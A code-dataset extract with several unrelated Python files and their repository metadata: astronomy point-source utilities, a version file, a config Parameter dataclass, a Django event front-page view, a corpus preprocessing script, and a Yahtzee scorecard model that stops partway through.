rowAxis[i] = np.mean(temp_ra)
colAxis[i] = np.mean(temp_ca)
peaks[i] = np.max(temp_peak)
idx = np.where(temp_peak==peaks[i])[0][0]
ang[i] = temp_ang[idx]
i = i + 1
final_list = np.array([colIdx,rowIdx,colAxis,rowAxis,ang,peaks]).transpose()
return final_list
def logManager(loglevel="INFO",toolname="egf2ps",appname = ""):
"""
A simple logging manger to configure the logging style.
Parameters
----------
loglevel: str
Level of logging, which can be "DEBUG","INFO","WARNING","ERROR",
and "CRITICAL". Default as "INFO".
toolname: str
Name of the tool.
appname: str
Name of the method or class.
Reference
---------
[1] Reitz, K., and Schlusser, T.
"The Hitchhiker's Guide to Python",
O'Reilly, 2016.
"""
# Formatter<TODO>
formatter = logging.Formatter(
'[%(levelname)s %(asctime)s]'+ toolname +
'--%(name)s: %(message)s')
# Set handler
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# Initialize logger
logger = logging.getLogger(appname)
logger.addHandler(handler)
# Set level
level = "logging." + loglevel
logger.setLevel(eval(level))
return logger
| 27.038314 | 102 | 0.536063 | # Copyright (c) Zhixian MA <zxma_sjtu@qq.com>
# MIT license
"""
Some I/O and processing tools are provied in this utils module.
Methods
-------
reg2mat:
Read point sources list from the region file, and translate it into np.ndarray
mat2reg:
Print PS list matrix to ds9 region files
compare:
Compare detected PS with the references
img2mat:
Read image from the provided path
logManager:
Configure logging style <to be strengthed>
References
------------
[1] scipy.ndimage
http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.
imread.html#scipy.ndimage.imread
"""
import os
import sys
import logging
import numpy as np
import pyregion
from astropy.io import fits
from scipy.ndimage import imread
# Defination of functions
def reg2mat(filename):
"""
Read region files and transform to matrix,the pyregion module is used.
"""
# Init
if os.path.exists(filename):
pslist = pyregion.open(filename)
else:
return 0
# Split and get the numbers
num_ps = len(pslist)
ps = []
for i in range(num_ps):
ps.append(pslist[i].coord_list)
ps = np.array(ps)
return ps
def mat2reg(ps,outfile,pstype = 'elp'):
"""
Transform ps mat to region file
Parameters
----------
ps: np.ndarray
A two dimensional matrix holds the information of point sources
outfile: str
Name of the output file
pstype: str
Type of region, can be 'elp','cir','box'
"""
reg = open(outfile,'w+')
if pstype is 'elp':
for i in range(ps.shape[0]):
ps_str = 'ellipse(' + str(ps[i,0])+','+ str(ps[i,1])+\
','+str(ps[i,2])+','+str(ps[i,3])+','+str(ps[i,4])+')\n'
reg.write(ps_str)
elif pstype is 'cir':
for i in range(ps.shape[0]):
ps_str = 'circle(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+')\n'
reg.write(ps_str)
else:
for i in range(ps.shape[0]):
ps_str = 'box(' + str(ps[i,0])+','+ str(ps[i,1])+','+str(ps[i,2])+','+str(ps[i,3])+',0)\n'
reg.write(ps_str)
def compare(ps,ps_ref):
"""
Compare detected ps with the real one or reference
Parameters
----------
ps: np.ndarray
Detected point source list
ps_ref: np.ndarray
Referenced point source list
Returns
-------
num_same: int
Number of same PS
cord_x,cord_y: list
Coordinates of the same PS
err_rate: float
Error rate
"""
# Init
num_same = 0
err_rate = 0.0
cord_x = []
cord_y = []
# Extract coordinates of ps and ps_ref
ps_x = ps[:,0].tolist()
ps_y = ps[:,1].tolist()
ps_ref_x = ps_ref[:,0].tolist()
ps_ref_y = ps_ref[:,1].tolist()
# Compare
i = 1
while i <= len(ps_ref_x) - 1:
j = 1
while j <= len(ps_ref_x) - 1:
d = np.sqrt((ps_x[j]-ps_ref_x[i])**2 + (ps_y[j]-ps_ref_y[i])**2)
if d <= 5:
num_same += 1
cord_x.append(ps_x[j])
cord_y.append(ps_y[j])
ps_x.remove(ps_x[j])
ps_y.remove(ps_y[j])
break
j += 1
i += 1
len_ps = ps.shape[0]
err_rate = (abs(len_ps - len(ps_ref_x)) + len(ps_ref_x) - num_same)/ len(ps_ref_x)
return num_same,err_rate,cord_x,cord_y
def img2mat(imgpath):
"""
Load image
Parameter
---------
imgpath: str
path of the image,the image can be fits or other image type files
"""
# Judge type of path
postfix = os.path.splitext(imgpath)[-1]
if postfix == '.fits':
try:
img = fits.open(imgpath)
except IOError:
sys.exit("The image can't be loaded.")
img_mat = img[0].data
else:
try:
img_mat = imread(imgpath,mode='L')
except IOError:
sys.exit("The image can't be loaded.")
img_mat = np.array(img_mat,dtype=float)/255
return img_mat
def cluster(pslist,dist=5,itertime=3):
"""Cluster of potential point sources
Parameter
---------
dist: int
Smallest distance between to point sources to be clustered
itertime: int
Time of iteration
"""
# Init
rowIdx = pslist[:,1].tolist()
colIdx = pslist[:,0].tolist()
rowAxis = pslist[:,3].tolist()
colAxis = pslist[:,2].tolist()
ang = pslist[:,4].tolist()
peaks = pslist[:,5].tolist()
# Clustering
for t in range(itertime):
i = 0
while i <= len(colIdx) - 1:
j = i + 1
xs = colIdx[i]
ys = rowIdx[i]
temp_x = [xs]
temp_y = [ys]
temp_peak = [peaks[i]]
temp_ra = [rowAxis[i]]
temp_ca = [colAxis[i]]
temp_ang = [ang[i]]
while j <= len(colIdx) - 1:
if np.sqrt((xs-colIdx[j])**2+(ys-rowIdx[j])**2)<=dist:
temp_x.append(colIdx[j])
temp_y.append(rowIdx[j])
temp_ra.append(rowAxis[j])
temp_ca.append(colAxis[j])
temp_peak.append(peaks[j])
temp_ang.append(ang[j])
# remove
rowIdx.remove(rowIdx[j])
colIdx.remove(colIdx[j])
rowAxis.remove(rowAxis[j])
colAxis.remove(colAxis[j])
peaks.remove(peaks[j])
ang.remove(ang[j])
# change j
j = j - 1
j = j + 1
# update
rowIdx[i] = round(np.mean(temp_y))
colIdx[i] = round(np.mean(temp_x))
rowAxis[i] = np.mean(temp_ra)
colAxis[i] = np.mean(temp_ca)
peaks[i] = np.max(temp_peak)
idx = np.where(temp_peak==peaks[i])[0][0]
ang[i] = temp_ang[idx]
i = i + 1
final_list = np.array([colIdx,rowIdx,colAxis,rowAxis,ang,peaks]).transpose()
return final_list
def logManager(loglevel="INFO",toolname="egf2ps",appname = ""):
"""
A simple logging manger to configure the logging style.
Parameters
----------
loglevel: str
Level of logging, which can be "DEBUG","INFO","WARNING","ERROR",
and "CRITICAL". Default as "INFO".
toolname: str
Name of the tool.
appname: str
Name of the method or class.
Reference
---------
[1] Reitz, K., and Schlusser, T.
"The Hitchhiker's Guide to Python",
O'Reilly, 2016.
"""
# Formatter<TODO>
formatter = logging.Formatter(
'[%(levelname)s %(asctime)s]'+ toolname +
'--%(name)s: %(message)s')
# Set handler
handler = logging.StreamHandler()
handler.setFormatter(formatter)
# Initialize logger
logger = logging.getLogger(appname)
logger.addHandler(handler)
# Set level
level = "logging." + loglevel
logger.setLevel(eval(level))
return logger
| 0 | 0 | 0 |
91dcad4059e64ff29435b4bbb419c370b8bd3393 | 196 | py | Python | spatial_utils/_version.py | kevinyamauchi/spatial-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | 1 | 2021-09-07T09:58:18.000Z | 2021-09-07T09:58:18.000Z | spatial_utils/_version.py | kevinyamauchi/squidpy-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | null | null | null | spatial_utils/_version.py | kevinyamauchi/squidpy-utils | 239aed21e4c45375baf328a5d9c9e6401b94f386 | [
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '0.0.2.dev0+g3ce8781.d20210430'
version_tuple = (0, 0, 2, 'dev0+g3ce8781', 'd20210430')
| 32.666667 | 55 | 0.72449 | # coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '0.0.2.dev0+g3ce8781.d20210430'
version_tuple = (0, 0, 2, 'dev0+g3ce8781', 'd20210430')
| 0 | 0 | 0 |
dc19d0f362b886c19cd7240d4df95b51182b6cdb | 3,736 | py | Python | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | midynet/config/parameter.py | charlesmurphy1/fast-midynet | 22071d49077fce9d5f99a4664f36767b27edea64 | [
"MIT"
] | null | null | null | import pathlib
import typing
from typing import Any, Iterable, List, Optional, Set, Union, Type
from dataclasses import dataclass, field
__all__ = ("Parameter",)
@dataclass(order=True)
if __name__ == "__main__":
pass
| 30.876033 | 79 | 0.589936 | import pathlib
import typing
from typing import Any, Iterable, List, Optional, Set, Union, Type
from dataclasses import dataclass, field
__all__ = ("Parameter",)
@dataclass(order=True)
class Parameter:
name: str
value: Any = None
unique: bool = field(repr=True, default=False)
with_repetition: bool = field(repr=True, default=False)
force_non_sequence: bool = field(repr=True, default=False)
sort_sequence: bool = field(repr=True, default=True)
is_config: bool = False
__cache__: bool = field(repr=False, default=True)
__self_hash__: Optional[int] = field(repr=False, default=None)
@property
def datatype(self) -> Any:
return self.infer_type(self.value)
def get_sequence(self, values: Any) -> Union[List[Any], Set[Any]]:
if not issubclass(type(values), typing.Iterable) or isinstance(
values, str
):
seq = [values]
else:
seq = values.copy()
if not self.with_repetition and not self.is_config:
seq = list(set(seq))
if self.sort_sequence:
seq.sort()
return seq
def __getitem__(self, key: str) -> Any:
if not self.is_sequenced():
message = "this parameter is not sequenced."
raise LookupError(message)
return self.value[key]
def __hash__(self) -> int:
if self.__self_hash__ is None:
if isinstance(self.value, list):
h = hash(tuple(self.value))
else:
h = hash(self.value)
if self.__cache__:
self.__self_hash__ = h
else:
return h
return self.__self_hash__
def __reset_buffer__(self) -> None:
self.__self_hash__ = None
def set_value(self, value: Any) -> None:
value = value.value if issubclass(type(value), Parameter) else value
if issubclass(type(value), typing.Iterable) and not isinstance(
value, str
):
value = self.get_sequence(value)
self.value = value
self.__reset_buffer__()
def add_value(self, value: Any) -> None:
if issubclass(type(self.value), typing.Iterable):
self.value = self.get_sequence(list(self.value) + [value])
else:
self.value = self.get_sequence([self.value, value])
if len(self.value) == 1:
self.value = next(iter(self.value))
self.__reset_buffer__()
def add_values(self, values: Iterable[Any]) -> None:
seq = self.get_sequence(values)
for v in seq:
self.add_value(v)
self.__reset_buffer__()
def is_sequenced(self) -> bool:
return (
issubclass(type(self.value), typing.Iterable)
and not isinstance(self.value, str)
and not self.force_non_sequence
)
def is_unique(self) -> bool:
return self.unique
def infer_type(self, value: Any) -> Type:
if self.force_non_sequence or isinstance(value, str):
return type(value)
if isinstance(value, dict):
message = "invalid value type `dict`."
raise TypeError(message)
if issubclass(type(value), typing.Iterable):
return self.infer_type(next(iter(value)))
return type(value)
def generate_sequence(self) -> Any:
if self.is_sequenced():
for v in self.value:
yield v
else:
yield self.value
def format(self) -> str:
if isinstance(self.value, str) or isinstance(self.value, pathlib.Path):
return f"`{self.value}`"
else:
return f"{self.value}"
if __name__ == "__main__":
pass
| 2,711 | 776 | 22 |
6a8f8e112fc7ec8ceebd35cc7eb5921c068908d3 | 1,343 | py | Python | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | null | null | null | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | 1 | 2018-01-18T10:30:43.000Z | 2018-01-18T10:33:18.000Z | kirppu/frontpage.py | kcsry/kirppu | 91910867d5eff3b2cee2bf9e934db16e1f96ae14 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from datetime import date, timedelta
from django.shortcuts import render
__author__ = 'codez'
from .models import Event
| 23.561404 | 71 | 0.614296 | # -*- coding: utf-8 -*-
from datetime import date, timedelta
from django.shortcuts import render
__author__ = 'codez'
from .models import Event
def _events():
today = date.today()
# 26 weeks ~= half year
hidden_event_limit = today - timedelta(weeks=26)
events = Event.objects.filter(
end_date__gte=hidden_event_limit,
visibility=Event.VISIBILITY_VISIBLE,
).order_by("-start_date")
# Keep ongoing / just ended events for awhile in the "future" list.
old_event_limit = today - timedelta(days=7)
coming_events = []
old_events = []
for event in events:
if event.end_date >= old_event_limit:
if event.start_date <= today <= event.end_date:
event.fp_currently_ongoing = True
coming_events.append(event)
else:
old_events.append(event)
return coming_events, old_events
def front_page(request):
coming_events, old_events = _events()
return render(
request,
"kirppu/frontpage.html",
{
"events": coming_events,
"old_events": old_events,
},
)
def front_for_mobile_view(request):
events, _ = _events()
return render(
request,
"kirppu/frontpage_for_mobile_view.html",
{
"events": events,
},
)
| 1,124 | 0 | 69 |
591cf7175d695572a54719a70ee4c59ace4601e3 | 553 | py | Python | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | Code/preprocess_corpus.py | justjoshtings/Final-Project-Group4 | 71af8885817a524d3e1201712583e29df77bb630 | [
"MIT"
] | null | null | null | """
preprocess_corpus.py
Script to preprocess corpus data
author: @justjoshtings
created: 3/31/2022
"""
from Woby_Modules.CorpusProcessor import CorpusProcessor
if __name__ == "__main__":
print("Executing preprocess_corpus.py")
main()
| 21.269231 | 68 | 0.717902 | """
preprocess_corpus.py
Script to preprocess corpus data
author: @justjoshtings
created: 3/31/2022
"""
from Woby_Modules.CorpusProcessor import CorpusProcessor
def main():
SCRAPPER_LOG = '../Woby_Log/ScrapperLog.log'
CORPUS_FILEPATH = '../corpus_data/'
parser = CorpusProcessor(CORPUS_FILEPATH, log_file=SCRAPPER_LOG)
print('Corpus size: ', parser.corpus_size()/1e6, 'MB')
parser.clean_corpus()
parser.EDA()
parser.split_by_sentence()
if __name__ == "__main__":
print("Executing preprocess_corpus.py")
main()
| 284 | 0 | 23 |
f1a78ba48b4488e2e7ed9d6db9447a1689a17b95 | 29,357 | py | Python | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | yahtzee/model.py | sdenholm/yahtzee | 0a3c6695bfd282162ee701147b16bc928d4b1e12 | [
"MIT"
] | null | null | null | import logging
logger = logging.getLogger(__name__)
import itertools
import random
from collections import OrderedDict
import functools
import numpy as np
import pandas as pd
from enum import Enum
| 33.28458 | 113 | 0.653609 | import logging
logger = logging.getLogger(__name__)
import itertools
import random
from collections import OrderedDict
import functools
import numpy as np
import pandas as pd
from enum import Enum
class Scorecard:
numberWords = {
1: "ones", 2: "twos", 3: "threes", 4: "fours", 5: "fives",
6: "sixes", 7: "sevens", 8: "eights", 9: "nines", 10: "tens",
11: "elevens", 12: "twelves", 13: "thirteens", 14: "fourteens", 15: "fifteens",
16: "sixteens", 17: "seventeens", 18: "eighteens", 19: "nineteens", 20: "twenties"
}
MIN_DICE_FACES = 6
MAX_DICE_FACES = len(numberWords)
class ROW_NAME(Enum):
UPPER_TOTAL = "Upper Total"
UPPER_BONUS = "Upper Bonus"
THREE_OF_A_KIND = "Three of a Kind"
FOUR_OF_A_KIND = "Four of a Kind"
FULL_HOUSE = "Full House"
SMALL_STRAIGHT = "Small Straight"
LARGE_STRAIGHT = "Large Straight"
CHANCE = "Chance"
YAHTZEE = "Yahtzee"
YAHTZEE_BONUS = "Yahtzee Bonus"
LOWER_TOTAL = "Lower Total"
class POINTS(Enum):
UPPER_BONUS = 35
FULL_HOUSE = 25
SMALL_STRAIGHT = 30
LARGE_STRAIGHT = 40
YAHTZEE = 50
YAHTZEE_BONUS = 100
class PointsCalculator:
"""
# Class for determining the points for each section of scorecard, based on
# the current values of the dice
"""
@staticmethod
def _hasStraight(uniqueSortedDice, length):
"""
# Is there a straight sequence of <length> dice within the list of
# unique, sorted dice
"""
# if we don't have enough dice for a straight
if len(uniqueSortedDice) < length:
return False
# check if we can find a sequence in the list of unique, sorted dice
for comb in itertools.combinations(uniqueSortedDice, length):
if comb == tuple(range(comb[0], comb[0] + length)):
return True
# no dice
return False
@staticmethod
def _hasFullHouse(diceCounts):
"""
# Do we have a full house, i.e., only two unique dice values, with
# at least 2 of everything
"""
return len(diceCounts.index) == 2 and (diceCounts > 1).all()
@staticmethod
def _hasYahtzee(diceCounts):
""" Do we have a Yahtzee, i.e., all dice values are the same """
return len(diceCounts) == 1
@staticmethod
def _calcOfAKindScore(num, kind, diceValues):
"""
# Calculate score of X-of-a-kind, e.g., 3-of-a-kind
#
# num: (int) hpw many of-a-kind
# kind: (int) dice value to look for <num> of
# diceValues: (list) actual dice values to process
#
"""
valCounts = pd.Series(diceValues).value_counts()
# if we don't have enough "kind"s, then score is 0
# -e.g., not enough 4s
if valCounts.get(kind, 0) < num:
return 0
# if we have enough "kind"s, then score is sum of all dice
return sum(diceValues)
@staticmethod
def _calcSingleDiceScore(kind, diceValues):
"""
# Calculate score of a single dice value, e.g., upper section score for 3s
#
# kind: (int) dice value to look at
# diceValues: (list) actual dice values to process
#
"""
valCounts = pd.Series(diceValues).value_counts()
# add together all the "kind" of dice we see
return valCounts.get(kind, 0) * kind
def _calcUpperSection(self, diceValue):
""" score based on how many die of <diceValue> we have """
return self.diceCounts.get(diceValue, 0) * diceValue
def _calc3ofAKind(self):
# 3-of-a-kind score is max of all available three-of-a-kinds
# -note: in normal, 5-dice game, this is overkill
threeOfAKindScore = 0
for threeOfAKind in self.diceCounts.index[self.diceCounts > 2]:
threeOfAKindScore = max(threeOfAKindScore,
Scorecard.PointsCalculator._calcOfAKindScore(3, threeOfAKind, self.diceValues))
return threeOfAKindScore
def _calc4ofAKind(self):
# 4-of-a-kind score is max of all available four-of-a-kinds
# -note: in normal, 5-dice game, this is overkill
fourOfAKindScore = 0
for fourOfAKind in self.diceCounts.index[self.diceCounts > 3]:
fourOfAKindScore = max(fourOfAKindScore,
Scorecard.PointsCalculator._calcOfAKindScore(4, fourOfAKind, self.diceValues))
return fourOfAKindScore
def _calcFullHouse(self):
# full house score
hasFullHouse = Scorecard.PointsCalculator._hasFullHouse(self.diceCounts)
fullHouseScore = Scorecard.POINTS.FULL_HOUSE.value if hasFullHouse else 0
return fullHouseScore
def _calcSmallStraight(self):
# small straight score
hasSmallStraight = Scorecard.PointsCalculator._hasStraight(self.uniqueSortedDice, len(self.diceSorted) - 1)
smallStraightScore = Scorecard.POINTS.SMALL_STRAIGHT.value if hasSmallStraight else 0
return smallStraightScore
def _calcLargeStraight(self):
# large straight score
hasLargeStraight = Scorecard.PointsCalculator._hasStraight(self.uniqueSortedDice, len(self.diceSorted))
largeStraightScore = Scorecard.POINTS.LARGE_STRAIGHT.value if hasLargeStraight else 0
return largeStraightScore
def _calcChance(self):
""" Chance score """
return sum(self.diceValues)
def _calcYahtzee(self):
""" Yahtzee score """
return Scorecard.POINTS.YAHTZEE.value if Scorecard.PointsCalculator._hasYahtzee(self.diceCounts) else 0
def _calcYahtzeeBonus(self):
# yahtzee bonus
canGetYahtzeeBonus = len(self.diceCounts) == 1 and\
self.scorecard.getRowScore("Yahtzee") is not None
return Scorecard.POINTS.YAHTZEE_BONUS if canGetYahtzeeBonus else None
def __init__(self, scorecard):
"""
#
# scorecard: (scorecard) to base our calculations on
#
"""
self.scorecard = scorecard
# dice info
self.diceValues = None
self.diceSorted = None
self.diceCounts = None
self.uniqueSortedDice = None
## score function mappings
#self.scoreFn = {
# "Three of a Kind": self._calc3ofAKind,
# "Four of a Kind": self._calc4ofAKind,
# "Full House": self._calcFullHouse,
# "Small Straight": self._calcSmallStraight,
# "Large Straight": self._calcLargeStraight,
# "Chance": self._calcChance,
# "Yahtzee": self._calcYahtzee,
# "Yahtzee Bonus": self._calcYahtzeeBonus
#}
# score function mappings
self.scoreFn = {
Scorecard.ROW_NAME.THREE_OF_A_KIND: self._calc3ofAKind,
Scorecard.ROW_NAME.FOUR_OF_A_KIND: self._calc4ofAKind,
Scorecard.ROW_NAME.FULL_HOUSE: self._calcFullHouse,
Scorecard.ROW_NAME.SMALL_STRAIGHT: self._calcSmallStraight,
Scorecard.ROW_NAME.LARGE_STRAIGHT: self._calcLargeStraight,
Scorecard.ROW_NAME.CHANCE: self._calcChance,
Scorecard.ROW_NAME.YAHTZEE: self._calcYahtzee,
Scorecard.ROW_NAME.YAHTZEE_BONUS: self._calcYahtzeeBonus
}
# score sections that score max value when the joker rule applies
self.jokerEligibleSections = {
Scorecard.ROW_NAME.FULL_HOUSE: Scorecard.POINTS.FULL_HOUSE.value,
Scorecard.ROW_NAME.SMALL_STRAIGHT: Scorecard.POINTS.SMALL_STRAIGHT.value,
Scorecard.ROW_NAME.LARGE_STRAIGHT: Scorecard.POINTS.LARGE_STRAIGHT.value
}
def calculate(self, rowNameList, diceValues):
"""
# Find the score that would be earned in each row for <rowNameList>
# when given the <diceValues>
"""
logger.debug("points calculate: {}, {}".format(rowNameList, diceValues))
# sort and process dice
self.diceValues = diceValues
self.diceSorted = sorted(diceValues)
self.diceCounts = pd.Series(self.diceSorted).value_counts()
self.uniqueSortedDice = sorted(self.diceCounts.index.to_list())
# name of known lower sections, i.e., those in our score mapping
#scoreFnRows = [x.value for x in self.scoreFn.keys()]# list(self.scoreFn.keys())
#scoreFnRows = list(self.scoreFn.keys())
# separate the row names into upper and lower section rows
# -lower section rows are defined in Scorecard.ROW_NAME
# -upper section rows are assigned as everything else and checked later
upperSectionRows = []
lowerSectionRows = []
for rowName in rowNameList:
try:
lowerSectionRows.append(Scorecard.ROW_NAME(rowName))
except ValueError:
upperSectionRows.append(rowName)
results = {}
# upper section calculations
for sectionName in upperSectionRows:
# convert row word to number
try:
sectionNum = Scorecard.wordToNum(sectionName)
# raises KeyError if we have been passed an unknown row name
except KeyError:
raise KeyError("Unknown rowName was given: {}".format(sectionName))
# calculate the score for this row
results[sectionName] = self._calcUpperSection(sectionNum)
# does the joker rule apply, i.e.:
# -the yahtzee score has been taken, and is not 0
# -this the second+ yahtzee
isJoker = Scorecard.PointsCalculator._hasYahtzee(self.diceCounts) and\
self.scorecard.getRowScore(Scorecard.ROW_NAME.YAHTZEE.value) == Scorecard.POINTS.YAHTZEE.value
logger.debug("points calculate: isJoker: {}".format(isJoker))
# if the joker rule applies, scoring in the upper section takes priority
if isJoker:
# did we score in the upper section
scoredInUpperSection = sum(results.values()) > 0
# we add the yahtzee bonus regardless
currBonus = self.scorecard.getRowScore(Scorecard.ROW_NAME.YAHTZEE_BONUS.value)
if currBonus is None:
currBonus = 0
results[Scorecard.ROW_NAME.YAHTZEE_BONUS.value] = currBonus + Scorecard.POINTS.YAHTZEE_BONUS.value
# if we can score in the upper section, we have to, so we're done
if scoredInUpperSection:
logger.debug("points calculate: results (no lower): {}".format(results))
return results
logger.debug("points calculate: 2")
# lower section calculations
# -don't need to check for KeyErrors as <lowerSectionRows> is taken
# directly from <scoreFn>'s keys
for sectionName in lowerSectionRows:
results[sectionName.value] = self.scoreFn[sectionName]()
# if the joker rule applies then we can score the max values in
# the joker-eligible sections
if isJoker:
for rowName, maxRowScore in self.jokerEligibleSections.items():
if results.get(rowName.value, None) is not None:
results[rowName.value] = maxRowScore
return results
@staticmethod
def numToWord(num):
""" Convert an integer to it's name equivalent """
return Scorecard.numberWords[num].capitalize()
@staticmethod
def wordToNum(word):
""" Convert an integer name equivalent back to its integer """
wordLower = word.lower()
for k,v in Scorecard.numberWords.items():
if v == wordLower:
return k
raise KeyError("{} not present in mapping".format(wordLower))
def __init__(self, numberOfDiceFaces=6):
# CHECK: we support the number of dice faces
if numberOfDiceFaces < Scorecard.MIN_DICE_FACES or numberOfDiceFaces > Scorecard.MAX_DICE_FACES:
raise ValueError("dice faces must be between {} and {}"
.format(Scorecard.MIN_DICE_FACES, Scorecard.MAX_DICE_FACES))
# generate sections for each dice face
scorecardUpper = OrderedDict()
for num in range(1, numberOfDiceFaces+1):
scorecardUpper.update({Scorecard.numToWord(num): None})
scorecardUpper.update({"Upper Total": None})
scorecardUpper.update({"Upper Bonus": None})
# lower scoring sections
scorecardLower = OrderedDict()
scorecardLower.update({
"Three of a Kind": None,
"Four of a Kind": None,
"Full House": None,
"Small Straight": None,
"Large Straight": None,
"Chance": None,
"Yahtzee": None,
"Yahtzee Bonus": None,
"Lower Total": None,
})
# store info
self.numberOfDiceFaces = numberOfDiceFaces
# store the scorecard
self.scorecardUpper = scorecardUpper
self.scorecardLower = scorecardLower
# calculate the upper section's bonus threshold
self.upperBonusThreshold = sum(list(range(1, self.numberOfDiceFaces + 1))) * 3
def canScoreRow(self, rowName, diceValues):
""" Can we score, or update the score, in this row """
# free rows, i.e., can be score in
freeRows = self.getFreeRows()
# name of the upper section if this is a yahtzee
upperSectionDiceRow = Scorecard.numToWord(diceValues[0])
# if this is a joker then must score upper section first
if self.isJoker(diceValues) and upperSectionDiceRow in freeRows:
return rowName == upperSectionDiceRow
# not a joker, then check if the row is free
return rowName in freeRows
@staticmethod
def isBonusRow(rowName):
""" Is <rowName> a bonus row """
return rowName == Scorecard.ROW_NAME.YAHTZEE_BONUS
def isJoker(self, diceValues):
"""
# Does the joker rule apply
# -we have a yahtzee now
# AND
# -this isn't our first yahtzee
"""
diceCounts = pd.Series(diceValues).value_counts()
return len(diceCounts) == 1 and \
self.getRowScore(Scorecard.ROW_NAME.YAHTZEE.value) == Scorecard.POINTS.YAHTZEE.value
def getAllScores(self):
""" Return the full score card in order """
totalScorecard = OrderedDict
totalScorecard.update(self.scorecardUpper)
totalScorecard.update(self.scorecardLower)
return totalScorecard
def getRowNames(self, section="all"):
""" Return the names of all the scorecard rows, including the totals """
sectionNameLower = section.lower()
if sectionNameLower == "all":
return list(self.scorecardUpper.keys()) + list(self.scorecardLower.keys())
elif sectionNameLower == "upper":
return list(self.scorecardUpper.keys())
elif sectionNameLower == "lower":
return list(self.scorecardLower.keys())
else:
raise ValueError("unknown section: {}".format(section))
def getRowScore(self, rowName):
"""
# Get the score for the <rowName> row
#
# rowName: (str) name of row
"""
try:
return self.scorecardUpper[rowName]
except KeyError:
return self.scorecardLower[rowName]
def getPossibleScorecard(self, diceValues, rowNameList=None):
"""
# What are the possible scores given the dice values
# -total and bonuses are always set to None
#
# diceValues: (list) of dice values to use
# rowNameList: (list) name of section(s) to calculate, default is all
#
"""
logger.debug("getPossibleScorecard: dice: {}, sections: {}".format(diceValues, rowNameList))
# filter the rowNameList by free rows, or use all free rows if no rows
# are specified
freeRows = self.getFreeRows()
if rowNameList is None:
rowNameList = freeRows
else:
rowNameList = list(filter(lambda x: x in freeRows, rowNameList))
# create a points calculator and find the possible scores
pointsCalc = Scorecard.PointsCalculator(self)
scores = pointsCalc.calculate(rowNameList, diceValues)
# create a new, blank scorecard and populate it with our results
blankCard = Scorecard(self.numberOfDiceFaces)
for rowName, rowScore in scores.items():
blankCard.updateScore(rowName, rowScore, updateTotals=False)
return blankCard
def getTotalScore(self):
""" Calculate and return the total score """
upperTotal = self.getRowScore(Scorecard.ROW_NAME.UPPER_TOTAL.value)
if upperTotal is None:
upperTotal = 0
upperBonus = self.getRowScore(Scorecard.ROW_NAME.UPPER_BONUS.value)
if upperBonus is None:
upperBonus = 0
lowerTotal = self.getRowScore(Scorecard.ROW_NAME.LOWER_TOTAL.value)
if lowerTotal is None:
lowerTotal = 0
return upperTotal + upperBonus + lowerTotal
def updateScore(self, rowName, score, updateTotals=True):
"""
# Update the score for the <rowName> row
# -for normal rows the score is set to <score>, whilst bonus rows will
# be += the score
#
# rowName: (str) name of row to set
# score: (int) score to set
# updateTotals: (bool) should we also update the section totals/bonuses
#
"""
logger.debug("setScore: {} = {}".format(rowName, score))
# if the rowName is in the upper section, store it
if rowName in self.scorecardUpper:
# check if it's a bonus to add or score to set
if Scorecard.isBonusRow(rowName):
self.scorecardUpper[rowName] += score
else:
self.scorecardUpper[rowName] = score
if updateTotals:
self._updateUpperScore()
# if the rowName is in the lower section, store it
elif rowName in self.scorecardLower:
# check if it's a bonus to add or score to set
if Scorecard.isBonusRow(rowName):
self.scorecardLower[rowName] += score
else:
self.scorecardLower[rowName] = score
if updateTotals:
self._updateLowerScore()
# KeyError if the rowName isn't valid
else:
raise KeyError("unknown rowName: {}".format(rowName))
def _updateUpperScore(self):
""" Calculate and store the total score for the upper section """
# upper row names
upperKeys = list(self.scorecardUpper.keys())
# CHECK: total and bonus are at the end
if upperKeys[-2] != Scorecard.ROW_NAME.UPPER_TOTAL.value or\
upperKeys[-1] != Scorecard.ROW_NAME.UPPER_BONUS.value:
raise ValueError("scorecard layout is not as expected")
# add up in individual scores
total = 0
for rowKey in upperKeys[:-2]:
if self.scorecardUpper[rowKey] is not None:
total += self.scorecardUpper[rowKey]
# see if the bonus should be added
if total >= self.upperBonusThreshold:
self.scorecardUpper[upperKeys[-1]] = Scorecard.POINTS.UPPER_BONUS.value
else:
self.scorecardUpper[upperKeys[-1]] = None
# store the new total score
self.scorecardUpper[upperKeys[-2]] = total
def _updateLowerScore(self):
""" Calculate and store the total score for the lower section """
lowerKeys = list(self.scorecardLower.keys())
# CHECK: total is at the end
if lowerKeys[-1] != Scorecard.ROW_NAME.LOWER_TOTAL.value:
raise ValueError("scorecard layout is not as expected")
# add up in individual scores
total = 0
for rowKey in lowerKeys[:-1]:
if self.scorecardLower[rowKey] is not None:
total += self.scorecardLower[rowKey]
# store the new score
self.scorecardLower[lowerKeys[-1]] = total
def iterateOverScorecard(self):
""" Iterate over all the scorecard entries """
for k,v in self.scorecardUpper.items():
yield k,v
for k,v in self.scorecardLower.items():
yield k,v
def getFreeRows(self):
""" Returns list of row names that can be scored """
# ignore rows that base their value on something else
